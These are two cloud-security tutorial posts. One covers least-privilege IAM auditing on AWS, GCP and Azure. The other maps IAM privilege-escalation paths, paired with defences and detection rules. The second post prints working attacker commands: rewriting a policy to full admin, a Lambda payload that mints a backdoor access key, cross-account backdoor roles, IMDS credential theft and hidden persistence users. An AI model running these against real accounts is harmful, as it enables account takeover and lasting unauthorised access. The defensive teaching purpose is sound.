  │  Remove unused services · pin resource ARNs · add conditions   │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  5. GUARD  Validate in CI/CD before any policy merges          │
  │  aws accessanalyzer validate-policy → fail pipeline if findings │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  6. MONITOR  Weekly: new findings  Quarterly: full review      │
  │  On offboarding: immediate direct-permission audit             │
  └───────────────────────────┬─────────────────────────────────────┘
                              │
                              └──────────────────── back to 1

The AWS least privilege audit tools covered in this episode map directly onto steps 3–5. The cycle is the practice.


Introduction

An AWS least privilege audit starts by measuring the gap between what each identity is granted and what it actually uses. Then it closes that gap with the tooling AWS, GCP, and Azure all provide natively. The numbers from real environments are consistently worse than teams expect.

Last year I audited an AWS account for an e-commerce company. They’d been running in production for three years. Eight engineers, two teams, a moderately complex microservices architecture. Reasonable people, competent engineers, no obvious security negligence.

When I ran the IAM Access Analyzer policy generation job against their 12 Lambda execution roles and waited for it to pull 90 days of CloudTrail data, here’s what I found:

The average Lambda role had 47 granted permissions. The average Lambda was actually using 6 of them over 90 days. That’s a utilization rate of roughly 13%. The other 87% — the 41 permissions nobody was using — sat there as silent attack surface.

The worst example was a Lambda that processed image thumbnails. Its role had AmazonS3FullAccess plus AmazonDynamoDBFullAccess plus AWSLambdaFullAccess. Someone had attached three AWS managed policies early in development to “make sure everything worked” and never came back to tighten it. The Lambda needed three permissions: s3:GetObject on one bucket, s3:PutObject on another, and logs:CreateLogGroup. That’s it. Instead it had s3:* on all S3, full DynamoDB including delete, and the ability to create and delete other Lambda functions.

If an attacker had exploited a vulnerability in that image processor — a malformed image, a dependency with a CVE — they’d have had full S3 access, full DynamoDB access, and the ability to backdoor other Lambda functions. Not because anyone intended that. Because “make it work first, fix it later” is how IAM configurations drift.

This episode is “fix it later.” The tools exist. The methodology is straightforward. The gap between knowing you should do this and actually doing it is usually not understanding the tooling.


The Fundamental Problem: Granted vs Used

The central insight of IAM auditing is simple: what an identity is granted and what it actually uses are rarely the same thing.

AWS has published data from their own customer environments: the average IAM entity uses less than 5% of the permissions it has been granted. That 95% excess is not wasted. It’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

The tools to close this gap exist on all three platforms. The difference between organizations that operate at low IAM risk and those that don’t is usually not knowledge. It’s the discipline of actually running these tools regularly and acting on what they find.


AWS IAM Auditing

Last Accessed Data — The Starting Point

AWS tracks when each service was last called by each IAM entity. This tells you which service permissions have never been used:

# Generate last-accessed data for a specific role
aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/LambdaImageProcessor

JOB_ID="..." # returned by the above command

# Poll until complete (usually 30-60 seconds)
aws iam get-service-last-accessed-details --job-id "${JOB_ID}"

# Parse: find services that were never called
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | select(.TotalAuthenticatedEntities == 0) | .ServiceName'
# These services have never been accessed by this role — permissions can be removed

For finer granularity — which specific actions are used within a service:

aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:policy/AppServerPolicy \
  --granularity ACTION_LEVEL

aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | 
    select(.TotalAuthenticatedEntities > 0) |
    {service: .ServiceName, last_used: .LastAuthenticated}'

Access Analyzer — Generated Least-Privilege Policies

This is the tool I use most. It pulls 90 days of CloudTrail data for a role and generates a policy containing only the actions actually called:

# Start a policy generation job
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/LambdaImageProcessor"
  }' \
  --cloudtrail-details '{
    "trailArn": "arn:aws:cloudtrail:ap-south-1:123456789012:trail/management-events",
    "startTime": "2026-01-01T00:00:00Z",
    "endTime": "2026-04-01T00:00:00Z"
  }'

JOB_ID="..."
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

The output is a valid IAM policy document containing only what was called. Compare it against the current policy — the delta is everything that can be removed. I treat the generated policy as a starting point, not a final answer: occasionally a permission is needed but wasn’t exercised in the 90-day window (error handling paths, quarterly jobs, incident response capabilities). Review the generated policy against the function’s known requirements before applying it verbatim.

Access Analyzer also identifies external sharing you may not have intended:

# Find resources shared outside the account or organization
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

aws accessanalyzer list-findings \
  --analyzer-arn arn:aws:accessanalyzer:ap-south-1:123456789012:analyzer/account-analyzer \
  --filter '{"status":{"eq":["ACTIVE"]}}' \
  --output table
# Shows: S3 buckets, KMS keys, Lambda functions accessible from outside the account

And validates new policies before you apply them:

# Run this in CI/CD before any IAM policy gets merged
aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")'

# Exit non-zero if findings exist — fail the pipeline
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')
[ "$FINDINGS" -eq 0 ] || { echo "IAM policy has $FINDINGS security findings"; exit 1; }

CloudTrail for Targeted Investigation

When you need to understand what a specific role has been doing in detail:

# What API calls has LambdaImageProcessor made in the last 30 days?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=LambdaImageProcessor \
  --start-time "$(date -d '30 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output json | jq '.Events[] | {time:.EventTime, event:.EventName, source:.EventSource}'

# All IAM changes in the last 7 days — track who changed what
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time "$(date -d '7 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output table

Open Source Tooling

For a more comprehensive scan across an account:

# Prowler — runs hundreds of checks including IAM-specific ones
pip install prowler
prowler aws --profile default --services iam --output-formats json html

# Key IAM checks:
# iam_root_mfa_enabled
# iam_user_no_setup_initial_access_key
# iam_policy_no_administrative_privileges
# iam_user_access_key_unused → finds keys unused for 90+ days
# iam_role_cross_account_readonlyaccess_policy

# ScoutSuite — multi-cloud auditor with a report UI
pip install scoutsuite
scout aws --profile default --report-dir ./scout-report

GCP IAM Auditing

IAM Recommender — Automated Right-Sizing

GCP’s IAM Recommender analyses 90 days of activity and surfaces specific suggestions: “replace roles/editor with roles/storage.objectViewer.” It tells you exactly what to change, not just that something needs changing:

# List IAM recommendations for a project
gcloud recommender recommendations list \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --format=json | jq '.[] | {
    principal: .description,
    current_role: .content.operationGroups[].operations[] | select(.action=="remove") | .path,
    suggested_role: .content.operationGroups[].operations[] | select(.action=="add") | .value
  }'

# Mark a recommendation as applied (required to track progress)
gcloud recommender recommendations mark-succeeded RECOMMENDATION_ID \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --etag ETAG

In practice, I run IAM Recommender across all GCP projects in a quarterly review. The recommendations don’t age out — GCP continues to track them until you address them or explicitly dismiss them. Dismissed without action counts as a decision; it should be documented.

Policy Analyzer — Answering Access Questions

When you need to understand who has access to a specific resource, and why:

# Who can access a specific BigQuery dataset?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//bigquery.googleapis.com/projects/my-project/datasets/customer_analytics" \
  --output-partial-result-before-timeout

# What can a specific principal do in this project?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//cloudresourcemanager.googleapis.com/projects/my-project" \
  --identity="serviceAccount:[email protected]"

Finding Public Exposure

# Org-wide scan for allUsers or allAuthenticatedUsers bindings
gcloud asset search-all-iam-policies \
  --scope=organizations/ORG_ID \
  --query="policy.members:allUsers OR policy.members:allAuthenticatedUsers" \
  --format=json | jq '.[] | {resource: .resource, policy: .policy}'

Run this in every new environment you inherit. The results reliably surface data exposure incidents waiting to happen — public GCS buckets, publicly readable BigQuery datasets, APIs exposed to any authenticated Google account.


Azure IAM Auditing

Defender for Cloud — Baseline Recommendations

# Get IAM-related security recommendations
az security assessment list --output table | grep -i -E "(identity|mfa|privileged|owner)"

# Check specific conditions:
# "MFA should be enabled on accounts with owner permissions on your subscription"
# "Deprecated accounts should be removed from your subscription"
# "External accounts with owner permissions should be removed from your subscription"

Azure Resource Graph — Bulk Role Assignment Queries

Azure Resource Graph lets you query RBAC assignments across the entire tenant in a single call — essential for large Azure estates:

# All role assignments — who has what, where
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| extend principalId = properties.principalId,
         roleId = properties.roleDefinitionId,
         scope = properties.scope
| project scope, principalId, roleId
| limit 500" \
--output table

# Find all Owner assignments at subscription scope — high-risk
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| where properties.roleDefinitionId endswith '8e3af657-a8ff-443c-a75c-2fe8c4bcb635'
| where properties.scope startswith '/subscriptions/'
| project scope, properties.principalId" \
--output table

Entra ID Access Reviews — Automated Re-Certification

Access reviews send notifications to resource owners or users asking them to confirm that access is still appropriate. When someone doesn’t respond — or responds “no” — the access is removed:

# Create a quarterly access review for subscription Owner assignments
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions" \
  --body '{
    "displayName": "Quarterly Subscription Owner Review",
    "scope": {
      "query": "/subscriptions/SUB_ID/providers/Microsoft.Authorization/roleAssignments",
      "queryType": "MicrosoftGraph"
    },
    "reviewers": [{"query": "/me", "queryType": "MicrosoftGraph"}],
    "settings": {
      "mailNotificationsEnabled": true,
      "justificationRequiredOnApproval": true,
      "autoApplyDecisionsEnabled": true,
      "defaultDecision": "Deny",          ← if no response, access is removed
      "instanceDurationInDays": 7,
      "recurrence": {
        "pattern": {"type": "absoluteMonthly", "interval": 3},
        "range": {"type": "noEnd"}
      }
    }
  }'

The defaultDecision: Deny setting is the key. Access reviews that default to preserving access on non-response don’t actually remove anything. They just document that nobody reviewed it. Defaulting to revocation means inaction removes access, which is the correct behavior for privileged roles.


The Hardening Workflow

The methodology I apply when auditing any cloud IAM configuration:

Step 1: Inventory Everything

You cannot audit what you don’t know exists.

# AWS: full IAM snapshot in one call
aws iam get-account-authorization-details --output json > iam-snapshot-$(date +%Y%m%d).json
# Contains: all users, groups, roles, policies, attachments — everything

# GCP: export all IAM-relevant assets
gcloud asset export \
  --project=my-project \
  --output-path=gs://audit-bucket/iam-snapshot-$(date +%Y%m%d).json \
  --asset-types="iam.googleapis.com/ServiceAccount,cloudresourcemanager.googleapis.com/Project"

Step 2: Classify by Function

Group identities by purpose: human engineering access, CI/CD pipelines, application workloads, data pipelines, monitoring/audit. Each class has an expected permission profile. Anything outside the expected profile for its class is a finding.

A Lambda function with iam:* is not in the expected profile for application workloads. An EC2 instance role with s3:DeleteObject on * deserves a question. A CI/CD pipeline role with secretsmanager:GetSecretValue warrants understanding what secrets it actually needs.

Step 3: Find Unused Permissions

Apply the tools:
– AWS: Access Analyzer generated policies + Last Accessed Data
– GCP: IAM Recommender
– Azure: Defender for Cloud recommendations + sign-in activity analysis

For any permission unused in 90 days: document whether it’s still needed (rare operation, incident response capability) or can be removed.

Step 4: Right-Size Policies

Replace broad permissions with specific ones:

// Before: attached AmazonS3FullAccess to a read-only service
{
  "Action": "s3:*",
  "Effect": "Allow",
  "Resource": "*"
}

// After: only what the service actually calls
{
  "Action": ["s3:GetObject", "s3:ListBucket"],
  "Effect": "Allow",
  "Resource": [
    "arn:aws:s3:::app-assets-prod",
    "arn:aws:s3:::app-assets-prod/*"
  ]
}

Every wildcard you remove is attack surface eliminated. Not conceptually — concretely.

Step 5: Add Conditions as Guardrails

Conditions constrain how permissions are used even when they can’t be removed:

// Require MFA for sensitive operations — applies across all roles in the account
{
  "Effect": "Deny",
  "Action": ["iam:*", "s3:Delete*", "ec2:Terminate*", "kms:*"],
  "Resource": "*",
  "Condition": {
    "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
  }
}

// Restrict all non-service API calls to the corporate network
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["10.0.0.0/8", "172.16.0.0/12"] },
    "Bool": { "aws:ViaAWSService": "false" }   // allow calls made through AWS services (e.g., Lambda calling S3)
  }
}

Step 6: Build It Into CI/CD

IAM configuration changes that aren’t reviewed before they reach production will drift. Make the validation automatic:

# Pre-merge check in CI — catches wildcards and dangerous permissions before they land
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://changed-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')

if [ "$FINDINGS" -gt 0 ]; then
  echo "❌ IAM policy has $FINDINGS security findings — see below"
  aws accessanalyzer validate-policy --policy-document file://changed-policy.json \
    --policy-type IDENTITY_POLICY | jq '.findings[]'
  exit 1
fi

Step 7: Schedule Regular Reviews

IAM audit is not a one-time project. Build a cadence:

  • Weekly: Access Analyzer findings, IAM Recommender dismissals, new cross-account trust relationships
  • Monthly: Unused access keys report, inactive service accounts
  • Quarterly: Access reviews for privileged roles, full policy inventory review
  • On offboarding: Immediate review of departing engineer’s direct permissions and any roles whose trust policies name them

Quick Wins Checklist

Check AWS GCP Azure
No active root / global admin credentials GetAccountSummaryAccountAccessKeysPresent: 0 N/A Check Entra ID conditional access
MFA on all human privileged accounts IAM Credential report Google 2FA enforcement Conditional Access policy
No inactive credentials older than 90 days Credential report LastRotated SA key age Entra ID sign-in activity
No policies with Action:* or Resource:* on write Access Analyzer validate N/A Azure Policy
No public-facing storage S3 Block Public Access constraints/storage.publicAccessPrevention Storage account public access disabled
Machine identities use roles, not static keys Audit for access key creation on roles iam.disableServiceAccountKeyCreation Use Managed Identity
Permissions verified against actual usage Access Analyzer generated policy IAM Recommender Defender for Cloud recommendations

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM auditing is a core cloud security assessment activity — finding over-permission before attackers do
CISSP Domain 7 — Security Operations Continuous IAM right-sizing is an operational discipline requiring tooling, cadence, and ownership
ISO 27001:2022 5.18 Access rights Periodic review of access rights — this episode is the practical implementation of that control
ISO 27001:2022 8.2 Privileged access rights Reviewing and right-sizing elevated permissions; detecting unused privileged access
ISO 27001:2022 8.16 Monitoring activities Continuous IAM monitoring, CloudTrail analysis, and automated anomaly detection
SOC 2 CC6.3 Access removal processes — Access Analyzer, IAM Recommender, and Access Reviews are the tooling for CC6.3
SOC 2 CC7.1 Threat and vulnerability identification — unused permissions are latent attack surface, identifiable and removable

Key Takeaways

  • The average cloud identity uses less than 5% of its granted permissions — the 95% excess is attack surface, not just waste
  • AWS Access Analyzer generates a least-privilege policy from CloudTrail data — run it on every Lambda role, ECS task role, and EC2 instance profile quarterly
  • GCP IAM Recommender surfaces role right-sizing suggestions based on 90-day activity — they don’t expire until you address them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build IAM policy validation into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

What’s Next

EP10 covers cross-system identity federation — OIDC, SAML, and the trust relationships that let a single IdP authenticate users and workloads across cloud platforms, SaaS applications, and organizational boundaries. Understanding how federation works is also understanding how it can be exploited when trust is too broad.

Next: SAML vs OIDC federation

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Reading Time: 10 minutes

Meta Description: Understand how AWS privilege escalation works through iam:PassRole — learn the attack paths attackers use and the exact policies that block each one.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege Escalation


TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters
# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"
# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

Permission Why It’s Dangerous
iam:PassRole with Resource: * Assign any role to any service — enables immediate privilege escalation
iam:CreatePolicyVersion Rewrite any policy to grant anything — full account takeover in one API call
iam:AttachRolePolicy Attach AdministratorAccess to any role
iam:UpdateAssumeRolePolicy Add any principal to any role’s trust policy
iam:CreateAccessKey on other users Create persistent credentials for any IAM user
lambda:UpdateFunctionCode on privileged Lambda Inject malicious code into an elevated function
secretsmanager:GetSecretValue with Resource: * Read every secret in the account
ssm:GetParameter with Resource: * Read all Parameter Store values — often contains credentials
iam:CreateRole + iam:AttachRolePolicy Create and arm a backdoor role

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  [email protected]
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee [email protected] \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:[email protected]" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.


Detection — What to Alert On

Activity Event to Watch Priority
Role trust policy modified UpdateAssumeRolePolicy Critical
New IAM user created CreateUser High
Policy version created CreatePolicyVersion High
Policy attached to role AttachRolePolicy, PutRolePolicy High
SA key created (GCP) google.iam.admin.v1.CreateServiceAccountKey High
Role assignment at subscription scope (Azure) roleAssignments/write at /subscriptions/ Critical
CloudTrail logging disabled StopLogging, DeleteTrail Critical
GetSecretValue at unusual hours secretsmanager:GetSecretValue Medium

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
